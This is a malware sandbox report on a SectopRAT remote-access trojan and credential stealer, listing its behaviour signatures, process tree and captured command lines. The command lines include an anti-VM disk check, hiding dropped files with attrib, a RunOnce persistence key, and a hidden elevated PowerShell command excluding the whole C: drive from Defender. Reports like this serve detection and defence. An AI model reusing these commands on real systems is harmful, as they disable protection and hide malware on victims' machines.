Malware Analysis Report

2024-12-08 01:27

Sample ID 240904-yy8prawhje
Target aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe
SHA256 aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a
Tags
sectoprat credential_access discovery evasion execution persistence rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a

Threat Level: Known bad

The file aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe was found to be: Known bad.

Malicious Activity Summary

sectoprat credential_access discovery evasion execution persistence rat stealer trojan

SectopRAT payload

SectopRAT

Credentials from Password Stores: Credentials from Web Browsers

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Sets file to hidden

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Enumerates processes with tasklist

Suspicious use of SetThreadContext

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Runs ping.exe

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-04 20:12

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-04 20:12

Reported

2024-09-04 20:15

Platform

win11-20240802-en

Max time kernel

147s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe"

Signatures

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Downloads MZ/PE file

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\abbkkce = "\"C:\\eegeaeg\\AutoIt3.exe\" C:\\eegeaeg\\abbkkce.a3x" C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2404 set thread context of 3800 N/A C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2588 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp
PID 2588 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp
PID 2588 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp
PID 3748 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 3748 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 224 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2844 wrote to memory of 224 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2844 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2844 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3748 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 3748 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 3036 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3036 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3036 wrote to memory of 492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3036 wrote to memory of 492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 492 wrote to memory of 3252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tar.exe
PID 492 wrote to memory of 3252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tar.exe
PID 3036 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3036 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3036 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe
PID 3036 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe
PID 3036 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe
PID 2720 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe
PID 2720 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe
PID 2720 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe
PID 2104 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 2104 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 2104 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 2104 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 2104 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 2104 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 3136 wrote to memory of 1940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3136 wrote to memory of 1940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3136 wrote to memory of 1940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1272 wrote to memory of 3964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1272 wrote to memory of 3964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1272 wrote to memory of 3964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2104 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe
PID 2104 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe
PID 2104 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe
PID 3240 wrote to memory of 3252 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe
PID 3240 wrote to memory of 3252 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe
PID 3240 wrote to memory of 3252 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe
PID 3252 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp
PID 3252 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp
PID 3252 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp
PID 4948 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe
PID 4948 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe
PID 4948 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe
PID 4504 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp
PID 4504 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp
PID 4504 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp
PID 3220 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Windows\system32\cmd.exe
PID 3220 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Windows\system32\cmd.exe
PID 2676 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2676 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2676 wrote to memory of 996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2676 wrote to memory of 996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3220 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Windows\system32\cmd.exe
PID 3220 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Windows\system32\cmd.exe
PID 568 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 568 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 568 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 568 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe

"C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe"

C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp" /SL5="$5030A,4595545,205824,C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" cmd /c wmic diskdrive get model | FINDSTR /I "Virtual VBOX VMware">ds.txt

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get model

C:\Windows\system32\findstr.exe

FINDSTR /I "Virtual VBOX VMware"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" cmd /c interim.cmd

C:\Windows\system32\attrib.exe

attrib +s +h /D "C:\Users\Admin\AppData\Local\Temp\msdtadmin\*.*"

C:\Windows\system32\cmd.exe

cmd /c tar xf interim

C:\Windows\system32\tar.exe

tar xf interim

C:\Windows\system32\attrib.exe

attrib +s +h /D "C:\Users\Admin\AppData\Local\Temp\msdtadmin\*.*"

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe

".\231\231.exe"

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\asm-all.jar;lib\commons-email.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Add-MpPreference -Force -ExclusionPath "C:\""' -Verb RunAs}"

